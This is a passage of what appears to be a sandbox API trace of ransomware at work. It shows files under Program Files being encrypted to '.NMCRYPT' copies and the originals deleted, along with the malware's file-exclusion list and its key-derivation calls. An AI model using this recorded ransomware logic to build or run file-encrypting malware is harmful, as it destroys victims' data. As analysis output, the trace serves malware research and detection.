hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.854] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.854] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.855] CryptCreateHash (in: hProv=0x8e3908, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0156.855] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.855] CryptDeriveKey (in: hProv=0x8e3908, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad5f8) returned 1 [0156.855] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.855] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.855] wcslen (_String="\\\\?\\") returned 0x4 [0156.855] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad4f8) returned 1 [0156.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.855] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=247) returned 1 [0156.855] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.856] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0xf7, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0xf7, lpOverlapped=0x0) returned 1 [0156.856] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.856] GetLastError () returned 0x0 [0156.856] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.870] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.870] WriteFile (in: hFile=0x588, lpBuffer=0x607d50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.870] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0156.871] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", dwFileAttributes=0x20) returned 0 [0156.871] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 1 [0156.871] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0 [0156.871] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" [0156.871] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0156.871] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7f3.tmp")) returned 0xd7f3 [0156.872] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7f3.tmp"), dwFlags=0x1) returned 0 [0156.872] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD7F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd7f3.tmp")) returned 1 [0156.872] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0156.872] wcslen (_String="OK") returned 0x2 [0156.872] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.872] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.872] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0156.872] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0156.872] CryptReleaseContext (hProv=0x8e3908, dwFlags=0x0) returned 1 [0156.872] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.872] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*NMCRYPT") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*Recovers your files.html") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.exe") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.dll") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.lnk") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.bat") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.ini") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.msi") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*.scf") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*pagefile.sys*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*AppData*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\winrar\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\java\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\windows\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\ESET\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\AVG\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*Atheros*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*Realtek*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*bootmgr*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*boot*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*boot*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*IO.SYS*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*ntldr*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*chrome*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*opera*") returned 0 [0156.873] PathMatchSpecW (pszFile="base_altgr.xml", pszSpec="*firefox*") returned 0 [0156.873] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", pszSpec="*") returned 1 [0156.873] strlen (_Str="NMoreira") returned 0x8 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, 